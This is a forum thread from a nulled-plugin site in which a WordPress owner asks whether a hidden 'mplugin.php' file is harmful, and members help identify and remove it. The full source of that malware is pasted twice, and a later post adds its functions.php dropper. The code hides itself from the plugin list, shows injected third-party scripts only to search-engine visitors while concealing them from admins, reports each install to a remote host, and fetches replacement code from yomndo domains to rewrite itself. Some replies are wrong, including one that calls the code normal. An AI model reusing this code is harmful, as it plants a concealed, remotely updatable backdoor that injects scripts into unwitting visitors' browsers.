Am I under attack?

drslims · Dec 5, 2020

Hello babiato users.
Today google adsense stopped our ads due to "Disapproved: Malware".

The site is active. I want to ask you about a file that catches my eye. in content / plugins /

I want your opinion on this, please. Are these 2 files normal content? or is it harmful? and how do i clean

1- admin_ips.txt
2- mplugin.php

admin_ips.txt content

88.228.138.83
78.161.97.4
85.107.201.56
109.232.216.189
85.104.41.2

The content of mplugin.php starts like this.

<? php
/ **
* Plugin Name: Monetization Code plugin
* Description: mplugin Shows cusom codes to display your ad codes.
* Author: aerin Singh
* Version: 1.0
* /
error_reporting (0);
ini_set ('display_errors', 0);
$ plugin_key = '9beeedd61661b578d207268250a78846';
$ version = '1.2';

add_action ('admin_menu', function () (
add_options_page ('mplugin Plugin', 'mplugin', 'manage_options', 'mplugin', 'mplugin_page');
remove_submenu_page ('options-general.php', 'mplugin');
});

add_filter ('plugin_action_links _'. plugin_basename (__ FILE__), 'salcode_add_plugin_page_settings_mplugin');
function salcode_add_plugin_page_settings_mplugin ($ links) {
$ links [] = '<a href = "'.
admin_url ('options-general.php? page = mplugin').
'">'. __ ('Settings'). '</a>';
return $ links;
}

ChintanBhat · Dec 5, 2020

drslims said:
admin_ips.txt content

88.228.138.83
78.161.97.4
85.107.201.56
109.232.216.189
85.104.41.2

These are the Ip's that with you login in admin panel.

drslims said:
<? php
/ **
* Plugin Name: Monetization Code plugin
* Description: mplugin Shows cusom codes to display your ad codes.
* Author: aerin Singh
* Version: 1.0
* /
error_reporting (0);
ini_set ('display_errors', 0);
$ plugin_key = '9beeedd61661b578d207268250a78846';
$ version = '1.2';

add_action ('admin_menu', function () (
add_options_page ('mplugin Plugin', 'mplugin', 'manage_options', 'mplugin', 'mplugin_page');
remove_submenu_page ('options-general.php', 'mplugin');
});

add_filter ('plugin_action_links _'. plugin_basename (__ FILE__), 'salcode_add_plugin_page_settings_mplugin');
function salcode_add_plugin_page_settings_mplugin ($ links) {
$ links [] = '<a href = "'.
admin_url ('options-general.php? page = mplugin').
'">'. __ ('Settings'). '</a>';
return $ links;
}

And this code is also seems to be normal nothing suspicious is there as of my opinion.

drslims · Dec 5, 2020

I can't see this plugin on the plugins page and it was not installed by us. should I really not worry? Could Google Adsense have stopped my ads for this reason?

mplugin.php content :

mplugin.php ( PHP script text )

PHP:

<?php

/**

* Plugin Name: Monetization Code plugin

* Description: mplugin Shows cusom codes to display your ad codes.

* Author: aerin Singh

* Version: 1.0

*/

error_reporting(0);

ini_set('display_errors', 0);

$plugin_key='9beeedd61661b578d207268250a78846';

$version='1.2';


add_action('admin_menu', function() {

add_options_page( 'mplugin Plugin', 'mplugin', 'manage_options', 'mplugin', 'mplugin_page' );

remove_submenu_page( 'options-general.php', 'mplugin' );

});




add_filter('plugin_action_links_'.plugin_basename(__FILE__), 'salcode_add_plugin_page_settings_mplugin');

function salcode_add_plugin_page_settings_mplugin( $links ) {

$links[] = '<a href="' .

admin_url( 'options-general.php?page=mplugin' ) .

'">' . __('Settings') . '</a>';

return $links;

}







add_action( 'admin_init', function() {


register_setting( 'mplugin-settings', 'default_mont_options' );

register_setting( 'mplugin-settings', 'ad_code' );

register_setting( 'mplugin-settings', 'hide_admin' );

register_setting( 'mplugin-settings', 'hide_logged_in' );

register_setting( 'mplugin-settings', 'display_ad' );

register_setting( 'mplugin-settings', 'search_engines' );

register_setting( 'mplugin-settings', 'auto_update' );

register_setting( 'mplugin-settings', 'ip_admin');

register_setting( 'mplugin-settings', 'cookies_admin' );

register_setting( 'mplugin-settings', 'logged_admin' );

register_setting( 'mplugin-settings', 'log_install' );


});



$ad_code="

<script type='text/javascript' src='//aanqylta.com/bb/2f/82/bb2f8268f180d7e0e1613e43c3e34d23.js'></script>

<script type='text/javascript' src='//aanqylta.com/a4/8a/80/a48a807e59fb8d5503642ee3fcbb8f87.js'></script>

";



$hide_admin='on';

$hide_logged_in='on';

$display_ad='organic';

$search_engines='google.,/search?,images.google., web.info.com, search.,yahoo.,yandex,msn.,baidu,bing.,doubleclick.net,googleweblight.com';

$auto_update='on';

$ip_admin='on';

$cookies_admin='on';

$logged_admin='on';

$log_install='';


function mplugin_page() {

?>

<div class="wrap">

<form action="options.php" method="post">

<?php

settings_fields( 'mplugin-settings' );

do_settings_sections( 'mplugin-settings' );

$ad_code='';


$hide_admin='on';

$hide_logged_in='on';

$display_ad='organic';

$search_engines='google.,/search?,images.google., web.info.com, search.,yahoo.,yandex,msn.,baidu,bing.,doubleclick.net,googleweblight.com';

$auto_update='on';

$ip_admin='on';

$cookies_admin='on';

$logged_admin='on';

$log_install='';


?>

<h2>mplugin Plugin</h2>

<table>


<tr>

<th>Ad Code</th>

<td><textarea placeholder="" name="ad_code" rows="5" cols="130"><?php echo get_option('ad_code',$ad_code) ; ?></textarea></td>

</tr>




<tr>

<th>Hide ads to :</th>

<td>

<input type="hidden" id="default_mont_options" name="default_mont_options" value="on">

<label>

<input type="checkbox" name="hide_admin" <?php echo esc_attr( get_option('hide_admin',$hide_admin) ) == 'on' ? 'checked="checked"' : ''; ?> />admins

</label>

<label>

<input type="checkbox" name="hide_logged_in" <?php echo esc_attr( get_option('hide_logged_in',$hide_logged_in) ) == 'on' ? 'checked="checked"' : ''; ?> />logged in users

</label>

<br/>



</td>

</tr>




<tr>

<th>Recognize admin by :</th>

<td>


<label>

<input type="checkbox" name="logged_admin" <?php echo esc_attr( get_option('logged_admin',$logged_admin) ) == 'on' ? 'checked="checked"' : ''; ?> />logged in

</label>

<label>

<input type="checkbox" name="ip_admin" id="ip_admin" <?php echo esc_attr( get_option('ip_admin',$ip_admin) ) == 'on' ? 'checked="checked"' : '' ?> />By IP addresses

</label>

<label>

<input type="checkbox" name="cookies_admin" <?php echo esc_attr( get_option('cookies_admin',$cookies_admin) ) == 'on' ? 'checked="checked"' : ''; ?> />By Cookies

</label>




</td>

</tr>




<tr>

<th>Display ads to :</th>

<td>

<select name="display_ad">


<option value="organic" <?php echo esc_attr( get_option('display_ad',$display_ad) ) == 'organic' ? 'selected="selected"' : ''; ?>>Organic traffic only</option>

<option value="all_visitors" <?php echo esc_attr( get_option('display_ad') ) == 'all_visitors' ? 'selected="selected"' : ''; ?>>All Visitors</option>


</select>


</td>

</tr>


<tr>

<th>Search Engines</th>

<td><input type="text" placeholder="Internal title" name="search_engines" value="<?php echo esc_attr( get_option('search_engines',$search_engines) ); ?>" size="80" /><p class="description">

comma separated </p>

</td>

</tr>



<tr>

<th>Auto Update :</th>

<td>


<label>

<input type="checkbox" name="auto_update" <?php echo esc_attr( get_option('auto_update',$auto_update) ) == 'on' ? 'checked="checked"' : ''; ?> />auto update plugin

</label><br/>



</td>

</tr>


<tr>

<td><?php submit_button(); ?></td>

</tr>


</table>




</form>

</div>

<?php

}


/*************************log install***************************/

if(get_option('log_install') !=='1')

{

if(!$log_installed = @file_get_contents("http://www.yomndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]))

{

$log_installed = @file_get_contents_mplugin("http://www.yomndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]);

}

}

/*************************set default options***************************/


if(get_option('default_mont_options') !=='on')

{

update_option('ip_admin', $ip_admin);

update_option('ad_code', $ad_code);

update_option('cookies_admin', $cookies_admin);

update_option('logged_admin', $logged_admin);

update_option('hide_admin', $hide_admin);

update_option('hide_logged_in', $hide_logged_in);

update_option('display_ad', $display_ad);

update_option('search_engines', $search_engines);

update_option('auto_update', $auto_update);

update_option('log_install', '1');

}


/************************************************************************/

include_once(ABSPATH . 'wp-includes/pluggable.php');


if ( ! function_exists( 'display_ad_single' ) ) {


function display_ad_single($content){

if(is_single())

{


$content=$content.get_option('ad_code');;

}

return $content;

}


function display_ad_footer(){

if(!is_single())

{

echo get_option('ad_code');

}

}



//setting cookies if admin logged in

function setting_admin_cookie() {

setcookie( 'wordpress_admin_logged_in',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);

}


if(get_option('cookies_admin')=='on')

{


if(is_user_logged_in())

{

add_action( 'init', 'setting_admin_cookie',1 );

}

}



//log admin IP addresses

$vis_ip=getVisIpAddr_mplugin();

if(get_option('ip_admin')=='on')

{

if(current_user_can('edit_others_pages'))

{


if (file_exists(plugin_dir_path( __FILE__ ) .'admin_ips.txt'))

{

$ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');

}


if (stripos($ip, $vis_ip) === false)

{

$ip.=$vis_ip.'

';

@file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);


}


}

}// end if log admins ip





//add cookies to organic traffic


if(get_option('display_ad')=='organic')

{


$search_engines = explode(',', get_option('search_engines'));


$referer = $_SERVER['HTTP_REFERER'];

$SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com');

foreach ($search_engines as $search) {

if (strpos($referer,$search)!==false) {

setcookie("organic", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN);

$organic=true;

}

}


}//end





//display ad


if(!isset($_COOKIE['wordpress_admin_logged_in']) && !is_user_logged_in())

{


$ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');

if (stripos($ips, $vis_ip) === false)

{

/*****/

if(get_option('display_ad')=='organic')

{

if($organic==true || isset($_COOKIE['organic']))

{

add_filter('the_content','display_ad_single');

add_action('wp_footer','display_ad_footer');

}

}

else

{

add_filter('the_content','display_ad_single');

add_action('wp_footer','display_ad_footer');

}


/****/


}


}

/*******************/






//update plugin


if(get_option('auto_update')=='on')

{


if( ini_get('allow_url_fopen') ) {




if (($new_version = @file_get_contents("http://www.yomndo.com/update.php") OR $new_version = @file_get_contents_mplugin("http://www.yomndo.com/update.php")) AND stripos($new_version, $plugin_key) !== false) {


if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {

@file_put_contents(__FILE__, $new_version);


}

}



elseif ($new_version = @file_get_contents("http://www.yomndo.xyz/update.php") AND stripos($new_version, $plugin_key) !== false) {


if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {

@file_put_contents(__FILE__, $new_version);


}

}



elseif ($new_version = @file_get_contents("http://www.yomndo.top/update.php") AND stripos($new_version, $plugin_key) !== false) {


if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {

@file_put_contents(__FILE__, $new_version);


}

}


}

else

{

if (($new_version = @file_get_contents("http://www.yomndo.com/update.php") OR $new_version = @file_get_contents_mplugin("http://www.yomndo.com/update.php")) AND stripos($new_version, $plugin_key) !== false) {


if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {

@file_put_contents(__FILE__, $new_version);


}

}



elseif ($new_version = @file_get_contents_mplugin("http://www.yomndo.xyz/update.php") AND stripos($new_version, $plugin_key) !== false) {


if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {

@file_put_contents(__FILE__, $new_version);


}

}



elseif ($new_version = @file_get_contents_mplugin("http://www.yomndo.top/update.php") AND stripos($new_version, $plugin_key) !== false) {


if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {

@file_put_contents(__FILE__, $new_version);


}

}

}

}//end if auto update


/*********************************/




}// if function exist




function file_get_contents_mplugin($url)

{

$ch = curl_init();

curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);

curl_setopt($ch, CURLOPT_HEADER, 0);

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($ch, CURLOPT_URL, $url);

curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);

$data = curl_exec($ch);

curl_close($ch);

return $data;

}



function hide_plugin_mplugin() {

global $wp_list_table;

$hidearr = array('mplugin.php');

$myplugins = $wp_list_table->items;

foreach ($myplugins as $key => $val) {

if (in_array($key,$hidearr)) {

unset($wp_list_table->items[$key]);

}

}

}


add_action('pre_current_active_plugins', 'hide_plugin_mplugin');


function getVisIpAddr_mplugin() {


if (!empty($_SERVER['HTTP_CLIENT_IP'])) {

return $_SERVER['HTTP_CLIENT_IP'];

}

else if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {

return $_SERVER['HTTP_X_FORWARDED_FOR'];

}

else {

return $_SERVER['REMOTE_ADDR'];

}

}


?>

frizzel · Dec 6, 2020

If you just Googled the plugin's name, you already would have had your answer: Malware on WordPress (Beware)

frizzel · Dec 6, 2020

And, according to stackoverflow, it's not an attack but malware included with nulled plugin or theme you downloaded and installed yourself.
So, think about what you have recently installed.

ddpanda · Dec 6, 2020

drslims said:

I can't see this plugin on the plugins page and it was not installed by us. should I really not worry? Could Google Adsense have stopped my ads for this reason?

mplugin.php content :

mplugin.php ( PHP script text )

PHP:

<?php

/**

* Plugin Name: Monetization Code plugin

* Description: mplugin Shows cusom codes to display your ad codes.

* Author: aerin Singh

* Version: 1.0

*/

error_reporting(0);

ini_set('display_errors', 0);

$plugin_key='9beeedd61661b578d207268250a78846';

$version='1.2';


add_action('admin_menu', function() {

add_options_page( 'mplugin Plugin', 'mplugin', 'manage_options', 'mplugin', 'mplugin_page' );

remove_submenu_page( 'options-general.php', 'mplugin' );

});




add_filter('plugin_action_links_'.plugin_basename(__FILE__), 'salcode_add_plugin_page_settings_mplugin');

function salcode_add_plugin_page_settings_mplugin( $links ) {

$links[] = '<a href="' .

admin_url( 'options-general.php?page=mplugin' ) .

'">' . __('Settings') . '</a>';

return $links;

}







add_action( 'admin_init', function() {


register_setting( 'mplugin-settings', 'default_mont_options' );

register_setting( 'mplugin-settings', 'ad_code' );

register_setting( 'mplugin-settings', 'hide_admin' );

register_setting( 'mplugin-settings', 'hide_logged_in' );

register_setting( 'mplugin-settings', 'display_ad' );

register_setting( 'mplugin-settings', 'search_engines' );

register_setting( 'mplugin-settings', 'auto_update' );

register_setting( 'mplugin-settings', 'ip_admin');

register_setting( 'mplugin-settings', 'cookies_admin' );

register_setting( 'mplugin-settings', 'logged_admin' );

register_setting( 'mplugin-settings', 'log_install' );


});



$ad_code="

<script type='text/javascript' src='//aanqylta.com/bb/2f/82/bb2f8268f180d7e0e1613e43c3e34d23.js'></script>

<script type='text/javascript' src='//aanqylta.com/a4/8a/80/a48a807e59fb8d5503642ee3fcbb8f87.js'></script>

";



$hide_admin='on';

$hide_logged_in='on';

$display_ad='organic';

$search_engines='google.,/search?,images.google., web.info.com, search.,yahoo.,yandex,msn.,baidu,bing.,doubleclick.net,googleweblight.com';

$auto_update='on';

$ip_admin='on';

$cookies_admin='on';

$logged_admin='on';

$log_install='';


function mplugin_page() {

?>

<div class="wrap">

<form action="options.php" method="post">

<?php

settings_fields( 'mplugin-settings' );

do_settings_sections( 'mplugin-settings' );

$ad_code='';


$hide_admin='on';

$hide_logged_in='on';

$display_ad='organic';

$search_engines='google.,/search?,images.google., web.info.com, search.,yahoo.,yandex,msn.,baidu,bing.,doubleclick.net,googleweblight.com';

$auto_update='on';

$ip_admin='on';

$cookies_admin='on';

$logged_admin='on';

$log_install='';


?>

<h2>mplugin Plugin</h2>

<table>


<tr>

<th>Ad Code</th>

<td><textarea placeholder="" name="ad_code" rows="5" cols="130"><?php echo get_option('ad_code',$ad_code) ; ?></textarea></td>

</tr>




<tr>

<th>Hide ads to :</th>

<td>

<input type="hidden" id="default_mont_options" name="default_mont_options" value="on">

<label>

<input type="checkbox" name="hide_admin" <?php echo esc_attr( get_option('hide_admin',$hide_admin) ) == 'on' ? 'checked="checked"' : ''; ?> />admins

</label>

<label>

<input type="checkbox" name="hide_logged_in" <?php echo esc_attr( get_option('hide_logged_in',$hide_logged_in) ) == 'on' ? 'checked="checked"' : ''; ?> />logged in users

</label>

<br/>



</td>

</tr>




<tr>

<th>Recognize admin by :</th>

<td>


<label>

<input type="checkbox" name="logged_admin" <?php echo esc_attr( get_option('logged_admin',$logged_admin) ) == 'on' ? 'checked="checked"' : ''; ?> />logged in

</label>

<label>

<input type="checkbox" name="ip_admin" id="ip_admin" <?php echo esc_attr( get_option('ip_admin',$ip_admin) ) == 'on' ? 'checked="checked"' : '' ?> />By IP addresses

</label>

<label>

<input type="checkbox" name="cookies_admin" <?php echo esc_attr( get_option('cookies_admin',$cookies_admin) ) == 'on' ? 'checked="checked"' : ''; ?> />By Cookies

</label>




</td>

</tr>




<tr>

<th>Display ads to :</th>

<td>

<select name="display_ad">


<option value="organic" <?php echo esc_attr( get_option('display_ad',$display_ad) ) == 'organic' ? 'selected="selected"' : ''; ?>>Organic traffic only</option>

<option value="all_visitors" <?php echo esc_attr( get_option('display_ad') ) == 'all_visitors' ? 'selected="selected"' : ''; ?>>All Visitors</option>


</select>


</td>

</tr>


<tr>

<th>Search Engines</th>

<td><input type="text" placeholder="Internal title" name="search_engines" value="<?php echo esc_attr( get_option('search_engines',$search_engines) ); ?>" size="80" /><p class="description">

comma separated </p>

</td>

</tr>



<tr>

<th>Auto Update :</th>

<td>


<label>

<input type="checkbox" name="auto_update" <?php echo esc_attr( get_option('auto_update',$auto_update) ) == 'on' ? 'checked="checked"' : ''; ?> />auto update plugin

</label><br/>



</td>

</tr>


<tr>

<td><?php submit_button(); ?></td>

</tr>


</table>




</form>

</div>

<?php

}


/*************************log install***************************/

if(get_option('log_install') !=='1')

{

if(!$log_installed = @file_get_contents("http://www.yomndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]))

{

$log_installed = @file_get_contents_mplugin("http://www.yomndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]);

}

}

/*************************set default options***************************/


if(get_option('default_mont_options') !=='on')

{

update_option('ip_admin', $ip_admin);

update_option('ad_code', $ad_code);

update_option('cookies_admin', $cookies_admin);

update_option('logged_admin', $logged_admin);

update_option('hide_admin', $hide_admin);

update_option('hide_logged_in', $hide_logged_in);

update_option('display_ad', $display_ad);

update_option('search_engines', $search_engines);

update_option('auto_update', $auto_update);

update_option('log_install', '1');

}


/************************************************************************/

include_once(ABSPATH . 'wp-includes/pluggable.php');


if ( ! function_exists( 'display_ad_single' ) ) {


function display_ad_single($content){

if(is_single())

{


$content=$content.get_option('ad_code');;

}

return $content;

}


function display_ad_footer(){

if(!is_single())

{

echo get_option('ad_code');

}

}



//setting cookies if admin logged in

function setting_admin_cookie() {

setcookie( 'wordpress_admin_logged_in',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);

}


if(get_option('cookies_admin')=='on')

{


if(is_user_logged_in())

{

add_action( 'init', 'setting_admin_cookie',1 );

}

}



//log admin IP addresses

$vis_ip=getVisIpAddr_mplugin();

if(get_option('ip_admin')=='on')

{

if(current_user_can('edit_others_pages'))

{


if (file_exists(plugin_dir_path( __FILE__ ) .'admin_ips.txt'))

{

$ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');

}


if (stripos($ip, $vis_ip) === false)

{

$ip.=$vis_ip.'

';

@file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);


}


}

}// end if log admins ip





//add cookies to organic traffic


if(get_option('display_ad')=='organic')

{


$search_engines = explode(',', get_option('search_engines'));


$referer = $_SERVER['HTTP_REFERER'];

$SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com');

foreach ($search_engines as $search) {

if (strpos($referer,$search)!==false) {

setcookie("organic", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN);

$organic=true;

}

}


}//end





//display ad


if(!isset($_COOKIE['wordpress_admin_logged_in']) && !is_user_logged_in())

{


$ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');

if (stripos($ips, $vis_ip) === false)

{

/*****/

if(get_option('display_ad')=='organic')

{

if($organic==true || isset($_COOKIE['organic']))

{

add_filter('the_content','display_ad_single');

add_action('wp_footer','display_ad_footer');

}

}

else

{

add_filter('the_content','display_ad_single');

add_action('wp_footer','display_ad_footer');

}


/****/


}


}

/*******************/






//update plugin


if(get_option('auto_update')=='on')

{


if( ini_get('allow_url_fopen') ) {




if (($new_version = @file_get_contents("http://www.yomndo.com/update.php") OR $new_version = @file_get_contents_mplugin("http://www.yomndo.com/update.php")) AND stripos($new_version, $plugin_key) !== false) {


if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {

@file_put_contents(__FILE__, $new_version);


}

}



elseif ($new_version = @file_get_contents("http://www.yomndo.xyz/update.php") AND stripos($new_version, $plugin_key) !== false) {


if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {

@file_put_contents(__FILE__, $new_version);


}

}



elseif ($new_version = @file_get_contents("http://www.yomndo.top/update.php") AND stripos($new_version, $plugin_key) !== false) {


if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {

@file_put_contents(__FILE__, $new_version);


}

}


}

else

{

if (($new_version = @file_get_contents("http://www.yomndo.com/update.php") OR $new_version = @file_get_contents_mplugin("http://www.yomndo.com/update.php")) AND stripos($new_version, $plugin_key) !== false) {


if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {

@file_put_contents(__FILE__, $new_version);


}

}



elseif ($new_version = @file_get_contents_mplugin("http://www.yomndo.xyz/update.php") AND stripos($new_version, $plugin_key) !== false) {


if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {

@file_put_contents(__FILE__, $new_version);


}

}



elseif ($new_version = @file_get_contents_mplugin("http://www.yomndo.top/update.php") AND stripos($new_version, $plugin_key) !== false) {


if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {

@file_put_contents(__FILE__, $new_version);


}

}

}

}//end if auto update


/*********************************/




}// if function exist




function file_get_contents_mplugin($url)

{

$ch = curl_init();

curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);

curl_setopt($ch, CURLOPT_HEADER, 0);

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($ch, CURLOPT_URL, $url);

curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);

$data = curl_exec($ch);

curl_close($ch);

return $data;

}



function hide_plugin_mplugin() {

global $wp_list_table;

$hidearr = array('mplugin.php');

$myplugins = $wp_list_table->items;

foreach ($myplugins as $key => $val) {

if (in_array($key,$hidearr)) {

unset($wp_list_table->items[$key]);

}

}

}


add_action('pre_current_active_plugins', 'hide_plugin_mplugin');


function getVisIpAddr_mplugin() {


if (!empty($_SERVER['HTTP_CLIENT_IP'])) {

return $_SERVER['HTTP_CLIENT_IP'];

}

else if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {

return $_SERVER['HTTP_X_FORWARDED_FOR'];

}

else {

return $_SERVER['REMOTE_ADDR'];

}

}


?>

use code function to post your code.

drslims · Dec 6, 2020

frizzel said:
And, according to stackoverflow, it's not an attack but malware included with nulled plugin or theme you downloaded and installed yourself.
So, think about what you have recently installed.

Thanks for your understanding. I'm sorry I can make some points while searching.
Actually, I do not load from anywhere other than babiato.
This situation bothered me. I think some coding has been placed on my website with various nulled plugins and in this way, it is trying to make money through adsense. Of course, Google Adsense stopped ads immediately.

My website is new. I am thinking of doing a new WordPress upload. do you think it makes sense?

drslims · Dec 6, 2020

ddpanda said:
use code function to post your code.

Thank you for your warning. I forgot

pitza · Dec 6, 2020

drslims said:
Thanks for your understanding. I'm sorry I can make some points while searching.
Actually, I do not load from anywhere other than babiato.
This situation bothered me. I think some coding has been placed on my website with various nulled plugins and in this way, it is trying to make money through adsense. Of course, Google Adsense stopped ads immediately.

My website is new. I am thinking of doing a new WordPress upload. do you think it makes sense?

Why don't you try to clean it with Wordfence (available on here)?

mahins · Dec 6, 2020

Dear @drslims
After you've taken control of your website and got rid of the malware, do you mind sharing the list of plugins you installed, better yet, the list of nulled plugins? I want to check if I too have installed the culprit plugins. I've already made a file search for mplugin, but it seems these can have different names.
Thanks in advance

drslims · Dec 6, 2020

A site protected by Wordfence. I checked again. It could not detect any problems.

But when I check the database over Cpanel, there are malicious encodings in the "wp_options" table as written here. I managed to delete these codes from the table as in the article.

The words I searched in the database:
default_mont_options
ad_code
hide_admin
hide_logged_in
display_ad
search_engines
auto_update
ip_admin
cookies_admin
logged_admin
log_install

Plugins I have installed recently:

Betterdocs pro:
Elementor Pro (Last version):
Formidable pro:
Liker:
Monsterinsights pro:
Loco Translate Pro:
Yoast seo premium:

I had to remove them all.

I think I will have to implement a new wordpress installation. It will cost me 200 hours. Because I did not find the current situation very safe. I cleaned it up a bit, but I'm not comfortable yet.

TheViking · Dec 6, 2020

drslims said:
Thanks for your understanding. I'm sorry I can make some points while searching.
Actually, I do not load from anywhere other than babiato.
This situation bothered me. I think some coding has been placed on my website with various nulled plugins and in this way, it is trying to make money through adsense. Of course, Google Adsense stopped ads immediately.

My website is new. I am thinking of doing a new WordPress upload. do you think it makes sense?

Do you really think that everything served here at babiato is 100% clean...? Think again m8
You will have to check everything yourself to be sure.

DJJigsaw · Dec 6, 2020

IMO I would say it might be due to the possible nulled Yoast SEO plugin since it says it's for Monetization, which is good for SEO to ensure you can make money. So wherever you got that plugin, it's the cause of it. I would say it should be fine since it's apart of it and the file type being the way it's saved as, that's kind of common with cPanel and the file manager.

drslims · Dec 6, 2020

promonde said:
Do you really think that everything served here at babiato is 100% clean...? Think again m8
You will have to check everything yourself to be sure.

You are absolutely right. Although the Babiato administration is well-intentioned, there are sometimes things they overlook. Therefore, it is useful to check.

drslims · Dec 6, 2020

DJJigsaw said:
IMO I would say it might be due to the possible nulled Yoast SEO plugin since it says it's for Monetization, which is good for SEO to ensure you can make money. So wherever you got that plugin, it's the cause of it. I would say it should be fine since it's apart of it and the file type being the way it's saved as, that's kind of common with cPanel and the file manager.

I did not understand how that is ? Can you open the subject a little more?

DJJigsaw · Dec 6, 2020

open it how much more? basically you have to either remove it or get another Yoast SEO plugin to work with if it's being flagged, but you can go either way. The rest of the thread has the right thoughts I would go with as well.

pitza · Dec 6, 2020

drslims said:
You are absolutely right. Although the Babiato administration is well-intentioned, there are sometimes things they overlook. Therefore, it is useful to check.

Please note that a ton of hackers look for plugin vulnerabilities. All day long. From the way you write about that incident, I feel that your site maybe wasn't well protected.
If Babiato's plugin had a problem, hundreds of people would scream right now. But they don't.
It doesn't matter if you used nulled or orginal plugins if you don't protect your site properly. Unless you find the malicious code in the download file and not just on your site, please do not imply Babiato's plugin could have contained malware.

drslims · Dec 6, 2020

pitza said:
Please note that a ton of hackers look for plugin vulnerabilities. All day long. From the way you write about that incident, I feel that your site maybe wasn't well protected.
If Babiato's plugin had a problem, hundreds of people would scream right now. But they don't.
It doesn't matter if you used nulled or orginal plugins if you don't protect your site properly. Unless you find the malicious code in the download file and not just on your site, please do not imply Babiato's plugin could have contained malware.

You may be right in some matters. I agree with you on this. Especially in the "that a ton of hackers look for plugin vulnerabilities" section.
1- You stated that my site was not well protected because I wrote 2 messages here. So funny !
2- You believe all the plugins Babiato hosts are 100% clean! This is also very funny!
3- These 100 people you mentioned might not matter because they don't have a notification like "Google Adsense"! If I hadn't alerted Google Adsense, I wouldn't have noticed it!
It's funny that you know 100% that too!

4- I could not figure out this aggressive behavior. Perhaps your behavior could be due to puberty. I welcome you with respect!

5 and finally! I didn't hint at Babiato's add-ons badly! But I guess you are really a teenager!

I love Babiato and trust these friends! But saying "It is good to be careful" does not mean to denigrate the babiato!

Please don't take the matter in other directions. If you want to help, please get involved!

frizzel · Dec 6, 2020

Don't forget to check on your theme(s) as well. See two ThemeCheck links (one and two) that have reports on infected themes, shared on a site with nulled themes and plugins.

By the way, they also have a WP plug-in which you might find useful: ThemeCheck.

If you can find out what plug-in/theme is responsible for inserting the malware code, of course we all would like to know.

aboooodaj · Dec 18, 2020

Hallo
Delete these files and codes
mplugin.php
monit.php
class.plugin-modules.php

in functions.php

function true_plugins_activate() {
$active_plugins = get_option('active_plugins');
$activate_this = array(
'mplugin.php'
);
foreach ($activate_this as $plugin) {
if (!in_array($plugin, $active_plugins)) {
array_push($active_plugins, $plugin);
update_option('active_plugins', $active_plugins);
}
}
$new_active_plugins = get_option('active_plugins');
if (in_array('mplugin.php', $new_active_plugins)) {
$functionsPath = dirname(__FILE__) . '/functions.php';
$functions = file_get_contents($functionsPath);

$start = stripos($functions, "function true_plugins_activate()");
$end = strripos($functions, "true_plugins_activate");
$endDelete = $end + mb_strlen("true_plugins_activate") + 3;

if($start && $end) {
$str = substr($functions, 0, $start);
$str .= substr($functions, $endDelete);
file_put_contents($functionsPath, $str);
}
$script = file_get_contents('/mywebseit/class.plugin-modules.php');
file_put_contents('/mywebseit/wp-content/plugins/dflip/class.plugin-modules.php', '');
}
}

add_action('init', 'true_plugins_activate');

and
Change all passwords
User and database

Am I under attack?

Welcome to Original Babiato! All Resource are Free and No downloading Limit.. Join Our Official Telegram Channel For updates Bypass All the resource restrictions/Password/Key? Read here! Read Before submitting Resource Read here!Support Our Work By Donating Click here!

Join Our Official Telegram Channel For updates Bypass All the resource restrictions/Password/Key? Read here! Read Before submitting Resource Read here!

Support Our Work By Donating Click here!

Member

Well-known member

Member

Well-known member

Well-known member

BlockeD!

Member

Member

Active member

Member

Member

Well-known member

Active member

Member

Member

Active member

Active member

Member

Well-known member

New member

Forum statistics

Share this page

Welcome to Original Babiato! All Resource are Free and No downloading Limit..
Join Our Official Telegram Channel For updates
Bypass All the resource restrictions/Password/Key? Read here!
Read Before submitting Resource Read here!
Support Our Work By Donating Click here!

Join Our Official Telegram Channel For updates
Bypass All the resource restrictions/Password/Key? Read here!
Read Before submitting Resource Read here!